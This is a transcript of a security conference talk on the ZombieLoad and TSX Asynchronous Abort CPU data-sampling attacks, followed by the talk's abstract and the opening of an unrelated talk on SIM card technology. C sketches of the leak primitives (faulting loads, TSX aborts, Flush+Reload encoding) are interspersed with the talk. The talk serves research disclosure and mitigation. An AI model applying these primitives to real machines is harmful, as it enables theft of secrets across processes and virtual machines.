So how fast is this attack, this is one question, and the other is also why does the processor do this, and there's actually a patent, or multiple patents actually writing about this, and it says, if a fault occurs with respect to the load operation, it is marked as valid and completed. So in these cases, the processor deliberately sets this to valid and completed, because it knows the results will be thrown away anyway, so why not let it succeed. So how fast is this attack? Actually it's pretty fast, so it's 550 kilobytes per second, and the error rate is only 0.003 percent. Yeah, I can confirm that, so I also implemented that, and I put a secret into a cache line, a known secret in kernel memory, and then when I try to leak that with this meldon attack, we've just seen, then I get the values, and also p in there, and x is the secret, x is the secret I put in there, p, some noise I guess, so it's a bit noisy, as you said, and like this error rate from before. I'm not exactly sure what this noise is. And actually Intel explains that in more detail in their security advisory, so for instance on some implementations, speculatively probing memory will only pass data onto subsequent operations if it's resident in the lowest level data cache, the L1 cache, as we've seen now. This can allow the data in question to be queried by the malicious application leading to a side channel that reveals supervisor data. Wait, I'm not sure it's correct. For me it also works on the level 3 cache. But they say it's only 1. Yeah, but it works. I implemented that. You tried it. And it's also, it's not as fast anymore, yeah, it's just around 10 kilobytes, the error rate is 10 times as high as before, but still it works. So I removed it from the L1 cache, just have it in the L3 cache, my secret x again in kernel memory, and then I try to leak it, I get the x, the P, P, P, P. Look, they're Qs as well. But it's also the x in here. There's some x's in there and a bit of error. They're more x's than other letters, but still. Yeah, but I can see the secret. But how can you get rid of that? So if you read a P. Yeah, I don't know. How can I get rid of the noise? So I need to get rid of the. No, I can't hear anything. Noise cancelling headphones to get rid of the noise. Yes, yes, yes. No, you just throw statistics on this. That's basically the message here. Just throw statistics on that and it will be fine. Makes sense. And even if I think about what happened last year, so we presented the Meltdown attack at Black Hat and then we had one slide because we did one additional experiment because we said L1 is not a requirement because we can use uncashable memory where we mark pages as uncashable in the page tables so the CPU is not allowed to load them into the cache. Wait, but if I do that, it doesn't work. So if I remove it from the L3 as well, I don't have the DRAM, my secret X, and I try that I don't get it at all. I just get random noise here. Did you read this slide? No, it just said something about not in the cache. But there was more on the slide. So I always can't read from that. But only if we have a legitimate access on the sibling hyper thread. So this is a legit access to this memory location that you try to leak. Did you try it that way? So you mean I have to leak it and in the meantime have a legitimate access from somewhere else? Yes, then you can just grab it from the other one. That works. I told you. I really should continue reading after the first point. Maybe that helps. 
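The "just throw statistics on it" remark above amounts to repeating the noisy leak and keeping the most frequent value. A minimal sketch, where `leak_once()` is a hypothetical stand-in for one noisy leak attempt that returns a byte value or -1 when nothing was recovered:

```c
/* Hypothetical single attempt: returns 0..255, or -1 if nothing leaked. */
int leak_once(void);

/* Repeat the leak `tries` times and return the most frequent byte. */
int leak_byte_majority(int tries)
{
    int hist[256] = { 0 };
    int best = -1, best_count = 0;

    for (int i = 0; i < tries; i++) {
        int v = leak_once();
        if (v < 0)
            continue;                     /* this round produced no value */
        if (++hist[v & 0xff] > best_count) {
            best_count = hist[v & 0xff];
            best = v & 0xff;
        }
    }
    return best;   /* the most frequent value wins, or -1 if nothing leaked */
}
```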
So okay, there's some noise in there, but yeah, that works. And if some people remember what we wrote in the paper back then, which I want to quote, we suspect that Meltdown reads the value from the line fill buffers. As the fill buffers are shared between threads running on the same core, the read to the same address within the Meltdown attack could be served from one of the fill buffers allowing the attack to succeed. However, we'll leave further investigations on this matter open for future work. I don't like this sentence, like you always leave the stuff you don't want to do for future you. Yeah, fuck future. Yeah, but I can understand that at this point we had some kind of mental resource exhaustion already, with all this new stuff there. Okay, so maybe back to the technical details, right? We want to understand why this works, right? And if we look at this diagram again, it pretty much is the same as before. We have our load operation. It goes through the reorder buffer, through the scheduler to the load data execution port, and then has an entry in the load buffer, and there we will still update the same entries. Everything's the same so far, but now we know that it is not in the L1 data cache. So even if we do the look up there, we are sure that we won't find it there, but there are other locations where we can still get it from. And that's why Meltdown Uncacheable works. It just gets it from a different buffer. Yeah, what else could we do with this? I mean, future work should probably investigate that. Yeah, future work, of course. Yes, sure. I mean, at some point you're at this point where future you becomes present you, and you actually have to do the stuff you said this should be future work. So yes, at some point we arrived at this point where we said, okay, we have to do this future work here. Yes. And maybe also here is a good point. During all these works that we published here in this area, Meltdown, Spectre, ZombieLoad, what we learned was that actually there is no noise, and this has become pretty much a mantra in our group. Every time someone says, oh, there's a lot of noise in this experiment, there is no noise. Noise is just someone else's data. So what you say is we should analyze the noise, right? Because maybe it's something interesting. So maybe we do it in a scientific, mathematical way. Like this lemma here, like noise is someone else's data, and we take the limit here of Meltdown, because if you have Meltdown and this noise and we let the Meltdown attack go to nothing, then we are left with the noise, right? I don't think this is an appropriate use of limits. I don't think that works. Well, it looks science-y. Yes, it does. So, from the deep dive, Intel states: fill buffers may retain stale data from prior memory requests until a new memory request overrides the fill buffer, like Daniel showed in the animation. Under certain conditions, the fill buffer may speculatively forward data, including stale data. So under certain conditions, we can read what someone else's instruction or program read before. To a load operation that will cause a fault or assist. So we just need a load operation that faults, and with that, we can leak data. Wait, assist? What is that? That sounds confusing. Let's look at that with an experiment, right? We are scientists. So let's look at a simple page here and this page contains cache lines, as you explained before, and then we have some virtual mapping to this page.
And if you remember Meltdown, as we had before, then we have this faulting load on this mapping because it was a kernel address. It faulted there, and that was like this scenario of Meltdown. But now we need some complex situation or something, so let's map this physical page again with a different virtual address, so with a different mapping. And then we do something complicated for the CPU. So we have one access that's faulting, and we have a different access in parallel to the same cache line that removes it from the cache. The same thing we want to access in the cache. What would the cache do then? What would it return? It might get out of resources there. It's like, oh, super confusing. So that's a certain condition, I would say. Okay, so maybe we should also look at that ZombieLoad case in more detail in the micro architecture again. And in the micro architecture, we start again with the same single instruction. It's all the same. The difference between these attacks lies in the setup of the micro architecture, not in this specific instruction that is executed. And what we see here is that we again go through the same path, and this time the load buffer entry is again updated, and again, this part is not used for the lookup in L1, store buffer and line fill buffer. The lookup happens, but here now there's a complex load situation as Michael just described. So the processor realizes, I'm not sure how to resolve that, right? And says, I will stop this immediately. And now we have an interesting problem here, because what happens? The execution port still has to do something. It still has to finish something, and it will finish as early as possible. And now, I mean, we have a PPN, we have a cache line that matches, so why not return this one? And then we can just read any data that matches in the lowest few bits. Very nice. So this is basically a use-after-free in the load buffer. So it's a software problem in the hardware now. Oh. Great thing. But how do we then get the data out of that? I mean, it still dies, right? Yeah, but it's the same thing as in Meltdown. So instead of accessing the kernel address, we just have a faulting load with a complex load situation. It's the same thing. And then again, we encode the value in the cache, use flush and reload to look it up, and then we know exactly what was written there. OK, so I can do that. So I can really build that. It's not only theoretic. I can get to this complex situation here, actually, in software. So if I look at my application, I have the virtual address space, with user space and kernel space. If I allocate some physical page in physical memory, I get a mapping in user space. And then I need a second mapping. How do I get that? It's a nice thing, really convenient. The kernel maps the entire physical memory as well in the direct physical map. And so for every physical page I have, there's also a kernel page that maps this physical page. So I have this situation as before here. Ah, so the physical memory and the virtual memory are not the same size then? No, of course not. Virtual memory is a lot larger than that. But with that, I have one physical page mapped with an accessible page and mapped with an address I cannot access. That's one of the variants. Variant one was the easiest to come up with. I also have another variant, variant three. So I have this physical memory. I can map a page, a simple allocated user space page. And then I use shared memory.
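Before moving on to variant 3: the variant-1 trigger just described, a faulting load on the direct-physical-map alias of one of our own pages combined with a conflicting flush on the user mapping, might look roughly like the following. This is a heavily simplified sketch under stated assumptions: `kernel_alias` is assumed to be the known direct-physical-map address of the same physical page as `user_page`, fault handling and the Flush+Reload recovery are omitted, and the exact ordering details differ in the real proof of concept.

```c
#include <stdint.h>
#include <stddef.h>
#include <x86intrin.h>   /* _mm_clflush */

extern uint8_t oracle[256 * 4096];   /* same covert channel as before */

static void zombieload_v1_round(volatile uint8_t *user_page,
                                const uint8_t *kernel_alias)
{
    /* conflicting flush on the user mapping of the very same cache line */
    _mm_clflush((void *)user_page);

    /* Faulting load on the kernel (direct-physical-map) alias; the value
     * that is transiently forwarded can be stale fill-buffer data from
     * whatever ran on this core or its sibling, not this page's content. */
    uint8_t leak = *kernel_alias;

    /* encode it so Flush+Reload on `oracle` can recover the byte */
    *(volatile uint8_t *)&oracle[(size_t)leak * 4096];
}
```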
If I have shared memory with myself, I have two addresses to the same page. Wait, wait, wait. Shared memory that shouldn't fault. Yes, that's correct. So it still does. There's a nice trick with that. So of course, I can access that. It's my shared memory. I set it up. But there's something really interesting in the CPU. There's so-called microcode assists. So if you have the instruction stream that comes in, it has to be decoded. We have a decoder that can decode a lot of things to microops. And these microops then go to the max somewhere and to the back end. And we had that before. I listened to what you said. So yes, we have that decoder going on, back end, scheduler, blah. But sometimes there's something complicated. So maybe the decoder can't decode something because it's really complex and it needs some assistance for that. A microcode assist. And it goes to this microcode ROM, the store software, program software sequences that can handle certain things in the CPU. And this microcode ROM then emits the microops that are used in the back end. So it was not in my figure. No, this was interesting, complicated things here. So this is for really rare cases. So that shouldn't happen a lot of time because this is really expensive. Has to clear the ROM, insert microops into the scheduler. So it's really complicated. It's a kind of a fault in the microarchitecture, a microarchitectural fault. This happens, for example, in some cases. And one of the examples is when setting the access or the dirty bit in a page table entry. So when I first access a page, then this microarchitectural fault happens. It needs an assist. And then if we do that the first time, then it's a fault. And a nice thing on Windows is regularly reset. So we always have a fault all five seconds. All this stuff about the zombie load attack, I think we also want to think about something else here because for Spectre there was a movie and a song for Meltdown. No, no, no, no, no, come on. There's no zombie load. Just a few seconds maybe. Everyone knows that. There's no zombie load in there. Every time in my cash I see noise. That's the original. That's the original, yes. It's completely unmodified. No. Leaking from the fill box and come on. I'm sure this is the original. I got this from the Internet. We can continue playing it if you like. Maybe later we need to discuss things. So what can we actually attack with zombie load? So what we know is we can leak data on the same and from the sibling hyper thread. So what we can do is we can attack different applications running on the system. We can attack the operating system. We can attack SGX englaves. We can attack virtual machines. We can also attack the hypervisor running on the system from within a virtual machine. So it's really powerful but we still have a problem there. So for Meltdown it was really easy. You provide the entire virtual address, leak the data from there. For foreshadow you can provide the physical address, you leak the data from there. All are different attacks. You can at least specify the page offset. But for zombie load you can only specify a few bits here in the cache line. So there's not really control there. You can't really mount an attack with that. That's it. So we end here. It's impossible. No. It's not impossible. It's possible. So what we can do is we call it the so-called domino attack. 
So what we do, we read one byte and what we then do is we use the least significant four bits as a mask and match that to the next value that we are going to read. And if they overlap and are the same, we know that this second byte belongs to the first byte and we can continue and continue and read many, many bytes following after each other. So despite using, we have no control. We have really much control. Oh, that's nice. So I really implemented that. It's demo time. I hope it works. Let's see. So I need a credit card pin from someone. We don't see anything yet. I know. I know. Oh, no. Oh, no. What is my password? Oh, it's secure, right? Ah, yeah. No one tries a one-letter password. Okay. So where's my? I have here this. Okay. Easy passcode. What is it? Oh, it stores all my secure passwords in there. Okay. And you use a pin for that. Yes, my credit card pin. Anyone wants to give me that four digit credit card pin? I can try to leak that here. Yeah. Yeah. Oh, no, that's boring. No one has one, two, three, four as a credit card pin, I hope. And it runs inside a virtual machine without internet so nothing can leak here. Different code. It looks staged if we do that. Anyone else? Okay. 1337. Let's see. I think, well, you can do multiple numbers. Three. Seven. Nice. Nice. Live leakage, although it's in the VM without any internet connection, without anything, just some reload, leaking the things by input inside my virtual machine from the outside. If you do that again with a different number. Yeah, because no one believes that, right? Yeah. Okay. Let's see. Different number. Oh, no. Anyone? 1280. 1280. Yeah. Yeah. That really works. Okay, nice. I can actually steal data with that. Nice. So the question is what else can we do with that? Can you do something else? I don't know. Did you prepare any other demos? I need to find the slides again. You go back to the slides. Ah, there. So only this one demo. Oh, that's a... No, you find another one. Okay. Just a second. I find this very odd, right? There's variant 1 and 3. Isn't that odd? No, we use the trinary system now to count. Trinary system. Okay. Whatever. No, we shouldn't skip here. So we have different attacker models on the one hand with variant 1 as a privileged attacker where we have the kernel address and stuff like this. We can do this on Windows and on Linux for the microcode assist for variant 3. We can also do that as an unprivileged attacker on Windows because it clears the bit in the page table. So it's cross-platform. That's nice. Yes. Okay. How fast is it? It's 5.3 kilobytes per second for variant 1 and for variant 3, 7.3. That's not so impressive. I mean, if I want to make a logo and a website and everything, this won't... We need to get better than that. But it's a bit bad, right? Yeah, we should still mitigate that, right? Yeah. Yeah. So it's like disable hyperthreading. No, not practically. It works across hyperthreads, so we can disable that. Group scheduling is more realistic. Yeah, but this is so hard to implement. We can also override the microarchitectural buffers so that if the data is not there anymore, we can't leak it. So it might be a bit over. There's this instruction that was updated that overrides all the buffers with just a bit of cost there. There are also software sequences that can evict all the buffers, so there's no data there anymore. Which is quite odd because the software shouldn't see the buffers. Okay, then we buy new CPUs. Learn new CPUs, which are not affected anymore. That's a good thing. 
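The domino stitching described at the start of this passage can be reduced to a nibble-overlap check: a newly leaked byte is only accepted as the successor of the previous one if the overlapping four bits agree. This is a simplified illustration of the idea, not the exact encoding used in the published attack:

```c
#include <stdint.h>

/* A freshly leaked byte is accepted as the successor of the previous one
 * only if the overlapping nibbles agree: the low nibble of `prev` has to
 * reappear as the high nibble of `next`. Chaining such checks lets many
 * leaked bytes be stitched into a longer value despite the lack of
 * address control. */
static int domino_accept(uint8_t prev, uint8_t next)
{
    return (prev & 0x0f) == (next >> 4);
}
```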
So 8th, 9th generation, like the Coffee Lake and then the Cascade Lake. So Intel says on the website, like it fixes Meltdown, Foreshadow, RIDL, Fallout, MLPDS, MDSUM. So all these attacks there. You copied this from the website? Yeah, it's from the website. Why are there three questions? There's no ZombieLoad in there. I don't know. So they didn't say anything about ZombieLoad on the website? Maybe it's fake. We'll see. We'll see. Okay. So if we go back to the timeline, we have been working on attacks in this direction already in 2016, and the KAISER patch was actually a mitigation for a related attack. And we published this on May 4th. And in June, Jann Horn reports the Meltdown attack. And later that year, we also independently reported the Meltdown attack. Much later though. Yeah. Yes. So on February 15, we reported Meltdown Uncacheable because Intel said, no, you can only leak from L1, and we said, no, you can not only leak from L1. So we implemented this proof of concept. Yeah, we had quite some emails exchanged. We made it more nice and sent it again on March 8th. It was also difficult to convince our co-authors, actually, that we can leak data that is not in the L1 cache. But finally, before the paper was submitted, actually, we were able to convince them with a reference PoC. And we also explained there's a line fill buffer leakage on May 30. We reported ZombieLoad then on April 12th in 2019. ZombieLoad went public shortly afterwards because it was already under embargo for a long time. How convenient. On the same day, these new CPUs were announced. So I bought a new CPU because I wanted to be safe. So everything is fine. Well, it's still fine. No, well, more. It's fine. Everything is fine. Are you sure? So I'm not sure if everything is fine. Maybe we have a problem. Maybe there's a question. Which ZombieLoad variant works despite MDS mitigations? Variant 1, variant 3, variant 2, or none of them? I want to use a joker. You don't have any jokers. That's a pity. So Daniel, trinary was fake? There's no such thing. None. None. No, I will go with variant 2. It's the last question. And? Yes. Yes. What did I win? Yes, it's variant 2. Wait a second. You told me that there is no variant 2. Yeah, that was a joke. You really made that up? Trinary system? That's not even a word. I'm a bit confused here. There's a variant 2, so we count in normal numbers like everyone else. And if we go back to this, we have this meltdown setup, and then we have the certain condition setup with double mapping of one page. But this is so complex. Yes, it was too complex for you, so you simplified that. I didn't understand it when I came back from holiday. That's no joke. So you suppressed all the exceptions with TSX? Yes. Transactions, so you don't see any exception there. And then you decided to say, oh, you have two mappings to one page. Why do you need a kernel mapping? I mean, it's the same physical address, so I can just use one address. Yeah, you use the same address here. And then I wrote that in four lines. And it works. And it works. Well, that's bad. We use the transaction abort here that can happen with data conflicts in TSX. Many different ways. Exhaustion again, if you use too much data there. Certain instructions like IO or syscalls and synchronous exceptions that can also abort a transaction there.
Yeah, and Intel also gave out a statement that asynchronous events that can occur during a transactional execution, if this happens and leads to a transactional abort, this is a, yeah, this is, for instance, an interrupt, then this might be a problem. So what is really happening? Because in the code, we just access one address we allowed to access, and then we end the transaction. So what we do is we start in the transaction. We want to load our first address, which is our mapping address. This will be executed and the value that we read from there, we pass to our oracle to load it into the cache. So this is executed. If it returns the value, we access the address in the cache and the transaction ends. And everything is fine. So why does this leak? Like Daniel said, with asynchronous abort, which we do not cause by our own code within our transaction, something can go wrong. So in this case, when we start loading this address, and this is still happening, at some point in time, an interrupt can occur, like an NMI. And when this happens, this transaction has to be apported. And now the load address, the load execution also needs to be apported. And now picks up a stale value from the line fill buffer, for instance, from the load boards, and leaks that, which we then can recover. But this is a bit slow, because we need to wait for an NMI to occur, hitting the load execution at the right time. So what we now do is, as in the previous variants, we use the flush instruction, because there we induce a conflict in the cache line. So what is happening now, we dispatch the flush instruction, we start our transaction, we start our load, and executes it. This induces a complex situation, which causes the transaction to abort, allowing to leak with our load, which is now faulting to our Oracle to recover our data. And this is really nice, because this variant too now only relies on TSX. No complicated setup, nothing anymore, so as long as you have TSX, you can leak data. OK, but how fast is this? Is this now better? Yes, this is really nice, because now this is really fast. You get up to 40 kilobytes per second. That's already a lot faster. Yeah, and we can really use that to spy on something. Wait a second, if it's that fast, could you leak something with a higher frequency? Yeah, like a song. A song, yes. Maybe we can leak a song. But you didn't like the song though, right? No, no, I made it a bit faster. Faster? Sure. So... We can't see it though. I know, it's just a song. Come on, sounds better. No, this does not sound... No, no, it's not working. And what do you want to do with that now? You want to leak this. Yes. I'm going to play that with a muted player. Okay, with a muted player. With a muted player, and then I run some below at the same time. You still can't see anything. Yeah, I know. And then it should be able to pick up all the things I play. Okay. And then we get... And play that live. I mean, you said there's a lot of noise for this attack, right? So it will be very noisy then. So I can play here. Okay. And I can leak here. Let's see, it might be a bit noisy. Let's see if it works. Yeah, it sounds a bit like a metal version of it. But you can imagine... I think we can sell this as the zombie load filter. Yes. Yeah. It's really great. I think it's a great version if you spy on a Skype call like that. So you can still understand the future. Yeah. It works. So for the timeline, we reported zombie load on April 12th, and then on April 24 we reported variant 2. 
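To summarize the variant-2 mechanism described above in code: the "four lines" boil down to a flush followed by a load inside a TSX transaction that is then aborted asynchronously. This is a sketch, not the authors' code, assuming a CPU with RTM available (compile with -mrtm) and the same 256-page `oracle` array as before; the leaked value is unrelated to the content of `buf`.

```c
#include <stdint.h>
#include <stddef.h>
#include <immintrin.h>   /* _xbegin, _xend, _XBEGIN_STARTED (needs -mrtm) */
#include <x86intrin.h>   /* _mm_clflush */

extern uint8_t oracle[256 * 4096];   /* covert channel, flushed beforehand */

static void taa_round(volatile uint8_t *buf)
{
    _mm_clflush((void *)buf);   /* provoke the asynchronous transaction abort */

    if (_xbegin() == _XBEGIN_STARTED) {
        /* The load below is aborted asynchronously; the transiently used
         * value may be stale fill-buffer or load-port data, which gets
         * encoded into the oracle before the abort takes effect. */
        uint8_t leak = *buf;
        *(volatile uint8_t *)&oracle[(size_t)leak * 4096];
        _xend();
    }
    /* afterwards: Flush+Reload over the 256 oracle pages recovers the byte */
}
```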
And we showed that it works on the new CPUs. That shouldn't be vulnerable anymore. Yes. That was just before the embargo ended. Yeah. That was fun. Yeah. And then we had an emergency call. Another embargo. A call was set up there. Yeah, without this variant, of course. Yes. Which was quite funny because we had these ifdefs in the LaTeX code of the paper and just removed this variant. On the same day when ZombieLoad was disclosed, the new MDS-resistant CPUs came out. So you can actually buy them. Yes. We also reported on May 16 that the VERW and software sequences are insufficient. There's still some remaining leakage. It still makes attacks a lot harder. But yes, Intel also documented this. So this is... Yes. And only last month the variant 2 was disclosed. Yeah, we had the public disclosure. Oh, yeah. Right? I always wanted to be on a movie poster. Yeah. But where am I actually? Here. Oh, no. I don't know. But actually, so the process with Intel improved quite a lot over the last year. They invested a lot of effort into improving their processes. And I think by now I'm really happy to work with them. And I think they are also quite happy because they sent us a beer. And we were so happy about that and excited. And we didn't have time until last week. And then we finally had the beer. And that was also very nice. Anyway. But wait a minute. So the TAA attack, the variant 2, is just TSX plus our leak gadget. Yes. Like I said earlier, when you go back one year, we had some slides at Black Hat again. Yes. Where we had this code. And if I look at this code, it looks the same as before. It looks the same. Yes. Just without the flush. So if I just wait, I leak. But this is basically just our code from GitHub. We had this on GitHub. And on the slides for one year. Yes. And it was described in the Meltdown paper. Yeah. Hmm. Yeah. Not good. No one tries our PoCs on GitHub. Yes. Maybe you should also fix that. I mean, it's really easy, right? What about the mitigations? Yeah. If you don't have TSX anymore, then you can't have the TSX Asynchronous Abort. So super easy fix, right? No, no, no. You're kidding. No, actually, that's one of the mitigations. You can just disable Intel TSX. And that's the default after the latest microcode update. Where when you try to run the attack again, it doesn't work. And then you have to factor in some performance penalty. Yes. But on the other hand, we also have VERW to overwrite the affected buffers as before. But unfortunately, they do not work reliably. Also not the software sequences. So under certain conditions, you can still get leakage despite having these mitigations. But this is, yeah. Yeah. So but this was clear. Can we get any insights from that? I mean, so for ZombieLoad, it again falls into this category. We have transient execution attacks. It's a meltdown type attack. It uses faults there. You can classify the different variants by the fault they use. So we have the page fault for variant one. We have the microcode assists, these microarchitectural faults, for variant two and variant three. One is the TAA, the TSX Asynchronous Abort, which is not a visible fault, but a microarchitectural fault, and also the microcode assist for the accessed and dirty bit. And as we've presented last year, we put this up on a website like transient.fail. So you can play around with that, see what kind of attacks have been explored already. Yes. Nalala inside is here.
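For the VERW-based buffer overwriting mentioned above: on CPUs with the updated microcode, executing VERW with a memory operand also overwrites the affected microarchitectural buffers, which is how operating systems implement the MD_CLEAR mitigation. A user-space-style sketch; per Intel's documentation the overwrite does not depend on the outcome of the segment check itself, so the concrete selector value is secondary here.

```c
/* Executes VERW with a memory operand; with the MD_CLEAR microcode update
 * this also overwrites the affected microarchitectural buffers. */
static inline void md_clear_verw(void)
{
    unsigned short sel;

    /* any selector value stored in memory will do for this purpose */
    __asm__ __volatile__("mov %%ds, %0" : "=r"(sel));
    __asm__ __volatile__("verw %0" : : "m"(sel) : "cc");
}
```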
So we had these memory based side channel attacks for quite some years now where we look at addresses and then you see the addresses accessed or not. We can infer the instruction pointer. Then we had this meltdown attack where we had an address and we actually got the data from this address, which was completely new. And this looked like a bit different. And now with this data sampling, with ZombieLoad here, we have the missing link here between them, because now we know when we had this certain instruction pointer, then we get the data. So we can't specify the address of the data we want to leak, but at a certain instruction pointer we simply get the data. And we've seen some nice triangle that combines all these things and gives us more powerful primitives. So what are the lessons that we've learned? So when Meltdown and Spectre came out for us, it was like Spectre is here to stay. That's a long-term problem we have to take care of. And for Meltdown, everything is fixed. But by now we've seen many more Meltdown type attacks than Spectre type attacks. Yes. So we were wrong in that assessment. If you want to play around with that, so everything is also on GitHub, all the variants, so you can try yourself, see if you can reproduce that and build your own nice ZombieLoad music filters or stuff like that. And also in 2019, there were other papers in the same space. There was the Fallout paper and the RIDL paper, which also presented attacks in this area. So to conclude our talk, transient execution attacks are now the gift that keeps on giving. Yes. And as we have seen, this class of Meltdown attacks is a lot larger than previously expected. So we thought like it's only one, but we now have several Meltdown type attacks that we know. There might be more. Yes. The CPUs are largely deterministic. There is no noise. If you see noise, then usually it means it's data from somebody else. And now do we still have time for the remaining part of the song? I'm sure you'll meet us somewhere later. Go on, load, forever this way. It's not safe with these loads. And my load will go on forever. Some time left for questions, so please line up at the microphones if you have questions. We have questions from the internet. That's really nice. Signal angel, please. Can users recognize attacks with power monitoring tools, CPU frequencies, memory IOPS or other freely accessible tools? I don't think there is a tool tailored to detect those attacks. Certainly you would see with the current PoCs that we have, you would see a significant CPU utilization and probably also a lot of memory traffic. Other than that, so there are no dedicated tools so far. But also I think it's better to just patch these vulnerabilities than to try to detect them. Thank you. Microphone 4, please. In the timeline we saw that you reported variant 2 at the very end. You already had variant 1 and 3, so why the bizarre numbering? So we actually had variant 2 right in the beginning when we reported it, but we only discovered very briefly before the embargo ended that it actually behaves a bit differently. So there are two key moments. In April we reported variant 1 and 3 and then two weeks later on April 24 we reported variant 2. But for Cascade Lake we really wanted to buy a CPU, but the university budget is limited. So a few days before the embargo ended I ordered one online to test it. Also the CPU wasn't available before that. Yes, so that was apparently an accident of the cloud provider.
We suspect that we should not have been able to actually buy one before May 14. Yes, because that was the announcement of the CPU. When we were able to mount the attack on Cascade Lake, which they assumed is not affected by MDS type attacks, things got busy again because now we have an embargo ending in four days and there's a new variant that still is capable of leaking data on the new CPUs that they have. So previously none of the POCs showed that there is a difference in the micro-architectural behavior between those variants so that the TSX transaction, the S-Inchronous Abort, behaves differently was only known at that point. Okay, question answered. Do you still have one more? Okay, thank you. We have more questions from the signal engine or somebody lining up at microphone 1 please. Can you ask, do you have any other embargo going on right now? I don't know. Alright, so I don't see any other people, any other guys lining up at the microphone. So thanks again, a warm round of applause for those three guys. Thank you.
The ZombieLoad attack exploits a vulnerability of most Intel CPUs, which allows leaking data currently processed by other programs. ZombieLoad is extremely powerful, as it leaks data from user-processes, the kernel, secure enclaves, and even across virtual machines. Moreover, ZombieLoad also works on CPUs where Meltdown is fixed in software or hardware. The Meltdown attack published in 2018 was a hardware vulnerability which showed that the security guarantees of modern CPUs do not always hold. Meltdown allowed attackers to leak arbitrary memory by exploiting the lazy fault handling of Intel CPUs which continue transient execution with data received from faulting loads. With software mitigations, such as stronger kernel isolation, as well as new CPUs with this vulnerability fixed, Meltdown seemed to be solved. In this talk, we show that this is not true, and Meltdown is still an issue on modern CPUs. We present ZombieLoad, an attack closely related to the original Meltdown attack, which leaks data across multiple privilege boundaries: processes, kernel, SGX, hyperthreads, and even across virtual machines. Furthermore, we compare ZombieLoad to other microarchitectural data-sampling (MDS) attacks, such as Fallout and RIDL. The ZombieLoad attack can be mounted from any unprivileged application, without user interactions, both on Linux and Windows. In the talk, we present multiple attacks, such as monitoring the browsing behavior, stealing cryptographic keys, and leaking the root-password hash on Linux. In a live demo, we demonstrate that such attacks are not only feasible but also relatively easy to mount, and difficult to mitigate. We show that Meltdown mitigations do not affect ZombieLoad, and consequently outline challenges for future research on Meltdown attacks and mitigations. Finally, we discuss the short-term and long-term implications of Meltdown attacks for hardware vendors, software vendors, and users.
10.5446/53170 (DOI)
So our next talk is SIM card technology from A to Z and it's an in-depth introduction to SIM card technology that not a lot of people know much about. And our speaker, Harald, or LaForge as he's better known, is the founder of the open source mobile communications project. He's also a Linux kernel hacker. He has a very long and impressive bio and a Wikipedia page. Just means I'm old. So Harald, please give him a round of applause. SIM card technology from A to Z. All yours. Thanks a lot for the introduction. As you can see on the title slide, I actually had to change the title slightly because I couldn't find a single acronym related to SIM cards that starts with a Z. Now it's from A to X, not from A to Z anymore. So SIM card technology from APDU to X-RES, which are two acronyms in the context of SIM cards which we might get into or not. So what are we going to talk about in the next 45 or so minutes? What are the relevant specifications and specification bodies? What kind of interfaces and protocols relate to SIM cards? We're going to talk about the file system that exists in such SIM cards as well as the evolution of SIM cards from 2G to 5G. So that's basically from what, 91 to 2018. We will talk about SIM toolkit over the air, a little bit about eSIMs as well, the embedded SIMs. Introduction about myself was already given. So yeah, people complained sometimes that my slides are full of text and I need more diagrams so I tried to improve. So this is actually, one night I thought, okay, let's actually try to create a dotty graph of all the specs and how they cross-reference each other. And this is what I've come up with. And this is only the SIM card relevant specs, not other out-of-context specs that they may refer to. So yes, it's an interesting graph. The arrangement was done automatically by dotty, so don't complain to me about that. Yeah. Nevertheless, I will switch back to text and we will look at what kind of specifications there are in spec bodies. So most importantly, probably about any kind of chip card technology, we have the ISO, the international standardization organization, which has a series of specifications about what they call ICCs, which is integrated circuit cards. We also have the ITU, the International Telecommunications Union, which has a series of specs related to telecom charge cards. The title implies that these are things that came before SIM cards. So we're talking about the cards you put into pay phones and things like that in the 80s. There's of course the 3G, sorry, there's of course ETSI, the European Telecommunications Standards Institute, which is the entity where GSM was originally specified. GSM being the first digital telephony system that used SIM cards, to the best of my knowledge at least, not a historian though. There's 3GPP, the Third Generation Partnership Project, which is where the GSM specs have been handed over to in the preparation of the 3G specification process, because ETSI is a European entity and Chinese companies, for example, or the Chinese government cannot participate there, or Americans, even to the extent that European companies can do so, so it was lifted to a new international group called the Third Generation Partnership Project. And they of course inherited all the SIM card related specifications. And then we have non-telecom standardization entities such as the GlobalPlatform card specification.
This GlobalPlatform is a body that specifies lots of aspects around Java cards, specifically around applet management, installation and so on, on Java cards, which brings us to the next entity which is not really a standardization body, but it's a private company that used to be called Sun and now it's part of Oracle, which defines the Java Card API, runtime and the virtual machine of Java cards. Last but not least, we have the GSM Association, which is the vendor club of the operators that doesn't really have to do that much with SIM cards until the eSIM, where then suddenly the GSMA plays a big role in the related specs and technology. So talking about the standardization bodies, what is the SIM actually? Well the SIM is the subscriber identity module. Probably anyone in here has one, likely more or at least has had. It's quite ubiquitous. Every device with cellular connectivity during the last whatever, 20 or so years, has a SIM, whether it's an actual card or whether it's soldered in these days. And SIM card hacking has a tradition in the CCC since at least 1998. I'm not sure how many people remember. There was the Vodafone Germany SIM card cloning attack back then. In Germany it was titled 'Von D2 Privat zu D2 Pirat', from D2 private to D2 pirate. And that was an attack that used weaknesses and sort of brute forcing against the authentication mechanism to recover the secret key which is stored in the card. And then you could clone SIM cards back then. That was then fixed in subsequent technology generations. And also around that time you can find on the FTP server of the CCC a SIM card simulator written in Turbo-C using a Season card. I'm not sure how many people remember Season cards. These were cards people used in the context of cracking satellite TV encryption. So meanwhile of course the SIM technology stack has increased and the complexity has increased like probably in any kind of technology. So let's recap basically from the beginning to today what SIM cards are and what they do in some degree of detail. If we start historically with SIM cards, actually the predecessor to the SIM cards that we know is the chip card used in the C-Netz, which is an analog telephony system that used to operate in Germany. There's actually an open source implementation these days as part of Osmocom Analog. If you're interested in that do check out Jolly at the vintage and retro computing area. And before 1988 they only had magnetic stripe cards but in 1988 they introduced integrated circuit cards in this analog telephony system and in GSM it was a chip card from the beginning. The concept of the SIM card means you store the identity of the subscriber outside of the phone which is very opposite to what happened in the CDMA world in the US around that time where it was basically inside the phone itself but having the identity separate of course enables all kinds of use cases that were relevant at that time. We will get to that to some extent. In addition to the identity (and the identity in this context means a cryptographic identity), there are all kinds of network related parameters that are stored in the SIM card. Some of those are static, meaning that they are provisioned or written by the operator into the card, or of course by the SIM card manufacturer on behalf of the operator, but which are not writable by the user. That affects things like access control classes, which means: are you a normal user or are you an emergency service user which needs higher priority to access the network, things like that.
